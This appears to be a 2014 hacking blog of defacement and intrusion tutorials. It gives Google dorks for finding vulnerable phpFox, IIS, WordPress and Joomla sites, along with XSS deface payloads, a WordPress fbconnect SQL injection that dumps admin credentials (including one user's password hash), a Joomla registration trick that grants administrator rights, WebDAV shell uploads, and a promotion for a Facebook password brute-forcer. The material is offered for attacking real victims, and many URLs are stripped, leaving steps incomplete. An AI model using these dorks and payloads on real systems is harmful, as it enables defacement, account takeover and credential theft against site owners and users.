Monday, 10 March 2014

DNS Hijacking with 000Webhost

Finding Target

1- Singup for an account at

2- Create a new site, just use the subdomain,for example mine was : 

Exploiting Target

1- Now Go to CPanel and Look for IP Adress, you'll get something like ""

2- Now Goto Bing .com and type dork ip: you want .gov .edu or any other particular domain then dork should be " ip: .gov " or " ip: .edu "

Server 1 with 253 ips -

Server 2 with with 253 ips -

Server 3 with 242 ips -

3- Let say our result/target is , simply add abcd or anything you like in front of the URL, so it would be like this

and you will get this error page

4- Now go to your Cpanel at 000webhost and park a subdomain 

 5- Now go to public_html and upload your deface page. :D


phpFox XSS Vulnerability

Finding Vulnerable Target

Dork: "intext:© · English (US) Powered By phpFox Version 3.0.1."

1- Choose any dork and paste on Google

2- Choose any site

Exploiting Target

1- So, your site would be like this or something similar,[ajax]=true&core[call]=core.message&height=150&width=300&message=<div class="error_message">Error Message Here&core[security_token]=99d754d2b583565369e194e30eaabcbc  

2- Now, change the error message with your HTML tags or anything you want.

To show Header

To show header in center


To show Title


To Add a Image
<img src="'><img src=""/>

To add a Message
<p><b>Your Message Here<b></p>

To write message in next lines
<p><b>First line<br>Second Line <b></p>

To add a scrolling Text
<marquee>Scrolling text Here</marquee>

To Add a alert box


To add background colour in page

<body bgcolor="red"/>

To Add a full deface Page
<title>Hacked!</title><body bgcolor=black><center><font color="white"><h2>XSSed!</h2><br><h1>./BL4CK E4GL3 W4S H3RE</h1><a href=''><marquee><img src=""/></marquee>

3- So it would be like this,[ajax]=true&core[call]=core.message&core[security_token]=860eb6a699d5d9f375b5e8cf0021c094&height=150&message=%20%3Ctitle%3EHacked!%3C/title%3E%3Cbody%20bgcolor=black%3E%3Ccenter%3E%3Cfont%20color=%22white%22%3E%3Ch2%3EXSSed!%3C/h2%3E%3Cbr%3E%3Ch1%3E./BL4CK%20E4GL3%20W4S%20H3RE%3C/h1%3E%3Ca%20href=%27

Live Demo:[ajax]=true&core[call]=core.message&core[security_token]=860eb6a699d5d9f375b5e8cf0021c094&height=150&message=%20%3Ctitle%3EHacked!%3C/title%3E%3Cbody%20bgcolor=black%3E%3Ccenter%3E%3Cfont%20color=%22white%22%3E%3Ch2%3EXSSed!%3C/h2%3E%3Cbr%3E%3Ch1%3E./BL4CK%20E4GL3%20W4S%20H3RE%3C/h1%3E%3Ca%20href=%27

IIS Exploit

Finding Vulnerable Target

Dork:  inurl:"~r00t.txt"
             intext:"Powered by IIS"


1- Choose any dork and paste on Google

2- Choose any site

Exploiting Target

1- Go to Start>Run

2- Copy and paste this code in the text box

%WINDIR%\EXPLORER.EXE ,::{20D04FE0-3AEA-1069-A2D8-08002B30309D}\::{BDEADF00-C265-11d0-BCED-00A0C90AB50F}

3- Click OK

4-Now a window will open. Choose File > New > Web Folder

5-Type the website’s address you want to deface in the text box and Click Next then Finish

6- Now Go to the Web Folder you created In My Computer > My Network Places. Open the Folder Paste your Shell.asp or deface page.

7- Now, to access your shell or to see your Deface Page, just open your browser and type the site name and
your shell name of deface page name like this-

Deface Page  


Exploit Wordpress : fbconnect SQL Injection Vulnerability

Hey guys, today i'm going to share with you about an exploit in Wordpress that enable you to get the admin's Username and Password(encrypted)

Finding Vulnerable Target

Dork: inurl:"fbconnect_action=myhome" 



1- Copy the dork and paste it on Google

2- Choose any site and you will see something like this or similar,

Exploiting Target

1- Let say your target URL is like this,


Paste the exploit behind the URL, so it will be like this,2,3,4,5,concat(user_login,0x3a,user_pass)

2- So there you go, you have the Username and the Password. But, don't forget to decrypt it first ;)


So in this case, the user is MarkMullins and the password is $P$BN0PffKCxFw7aBpWfeUz/kSumdPaeR.

3- After you have successfully decrypt the password, you can login into the website at


Saturday, 8 March 2014

Malaysian Site Hacked During Ops #Gila #Hempas As A Warning To The Govermernt of Malaysia

Once again, Malaysian Websites was attacked by hackers from their own country. If examined in detail, this time the attacks similar to the attack made by "Sofea Hana" during the last elections.

In the past, "Sofea Hana" listed several demands on the defense of the rights of the people, this time, Ops #Gila #Hempas also feature some of the claims. Defacement of them listed on the hacked website: -

  1. Oppose PBS implementation burden teachers and students. They are not experiments whatever reason given
  2. Abolish GST burden subtly .
  3. Against Trans- Pacific Partnership agreement Agreement ( TPPA )
  4. Kelantan willingly want to impose hudud. Let them implement hudud in advance while other states observe their development .   
  5. People increasingly pinched as the cost of living rising . Please execute Free Education 
  6. Multiply the number of affordable homes for the people.
  7. Please MACC perform tasks more transparent and unbiased .
  8. MACC urges probe leakages of public funds .
  9. Eliminate leeches Road ( Suit AES) .
  10. Please preserve the dignity of religious leaders is not just in the mouth alone, but through action .
  11. Please execute the administration of religious mold in total, not per the British .
  12. What's great about Taib Mahmud up her immune from MACC ? Please MACC bold and transparent in matters such as this !
  13. Lower the price of the vehicle . We can not afford to wait until PRU14 .
  14. Do not hide things about people , such as the rise in Senyap2 RON97 without the knowledge of the people .
  15. Why is there a high profile case closed while there are still no solution ? Please transparency in the investigation, we the people do not forget . 

  List of the hacked websited that have been submitted in Zone-H

Based on what we have been informed, Ops #Gila #Hempas this time joined by many local hacker groups including RED BEAN ARMY. 

SOURCE: TETIKUS.NET Hacked Via Text Load Injection by ./BL4CK E4GL3

I found this around 2 AM last night, and it's quite suprising that is vulnerable for Text Load Injection . Text load injection is where you're are allowed to inject text from ixData that is an indextable data type. So it will displays message as follow,

"error":"Invalid event parameter provided."}
We will get that message by visiting the following link:  
I tried to sumbit it on Defacement Mirror like Zone-H, but I can't 
because someone already sumbitted to that mirror, and it was 
a FAKE defacement. WTF?

Friday, 7 March 2014

Facebook Password Cracker v1 [Released!]

Hello everyone! This is the time that you guys have waiting for, the release of Facebook Password Cracker!


-Audio (supported in some OS with Mplayer)
-Coloured Text (supported in some OS/Python version)

This is just a brute forcer, so it won't confirm any success. It depends on your target. I advised you to make your own password list based on your target, so it would be more accurate. 



There is a voice saying "Welcome!" Once you've start it. It is supported in some OS with Mplayer. If you do not have Mplayer, you will get an error message like this,

"player: could not connect to socket
mplayer: No such file or directory

But don't worry, the programme will still running :D

Coloured Text

I put some colour to the text, so it won't looks boring only. This might not be supported by all OS/Python version, but the programme will still running :D


In case if you are trying to hack Facebook account from another country, you don't need to use proxy at all. I tested with an Israeli Facebook account, and it was successfully cracked without any problem.     

Important Note

There is disadvantage of this programme is, if you are in a STRONG internet connection, you cannot use a large password list. The maximum number of password in one wordlist is only 6. This is because, if you are brute forcing in a STRONG internet connection, your attack will be blocked by Facebook firewall.

But, if you are in a WEAK internet connection, you're free to use how many password in a wordlist as you like. There will be no interruption by Facebook firewall.    


Please tell us anything you want us to add/fix about this programme :) 

Exploit Joomla! : com_jinc


Dork: inurl:option=com_jinc



Shell Uploaded to:


This exploit is exactly the same as the previous post: Exploit Joomla :com_maian15

How to Upload Shell in Joomla! Site [Video]

Exploit Joomla! : Com_user [Manual]

  Hello everyone! It has been a while that i haven't update this blog post since i was very busy. So, as for today i wanna post about exploit in CMS Joomla! which the vulnerability is we can register new user on the site.

Finding Vulnerable target:


inurl:index.php/using/joomla site:com
intext:Joomla! is a flexible and powerful platform, whether you are building a small site for yourself or a huge site with hundreds of thousands of visitors site:com




1- Copy any of the dorks and paste it on Google
2- Choose any site and check administrator page by adding /administrator/ at the end of the site URL.



So you will see the admin login area. If the admin login area is like the picture below, it might be vulnerable,


 Not Vulnerable

*Note: Ignore the language of the admin login panel.
Exploiting Target

1- Paste the exploit behind the site URL, so you will get the registration form.

2- Fill in the form, at the password column, put different password.For Example,

Password: abcdefg
Confirm Password: abcxyz123

3- In the Confirm Email Column, click inspect element and paste this code below it,

<dd><input value="7" name="jform[groups][]"/></dd>

4- Click register, and it will says "Password not match.." or something similar, simply fill the form correctly and click register.

5- The confirmation email will be send to your email address, check your inbox and click on the link given to activate your account

6- Go to administrator login area, and login with your username and password.

Can't understand? Watch this video, and leave a comment :D

Also see: How to Upload Shell In Joomla! Site [Video]